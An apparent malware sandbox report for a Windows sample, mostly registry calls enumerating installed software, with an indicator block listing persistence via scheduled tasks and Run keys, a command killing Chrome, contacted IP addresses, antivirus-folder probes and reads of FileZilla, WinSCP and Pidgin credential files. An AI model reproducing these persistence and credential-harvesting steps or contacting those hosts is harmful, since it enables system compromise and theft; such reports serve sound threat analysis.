regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: Office15.PROPLUSR
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

 regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

 regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xc0000005
process_identifier: 2376
process_handle: 0x00000000000000bc
0 0

NtTerminateProcess

 status_code: 0xc0000005
process_identifier: 2376
process_handle: 0x00000000000000bc
1 0 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
host 185.106.92.214
host 31.41.244.14
host 31.41.244.188
host 31.41.244.237
host 31.41.244.253
host 62.204.41.6
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\linda5.exe reg_value C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nash.exe reg_value C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\anon.exe reg_value C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\newlege.exe reg_value C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mp3studios_97.exe reg_value C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\linda5.exe reg_value C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wish.exe reg_value C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

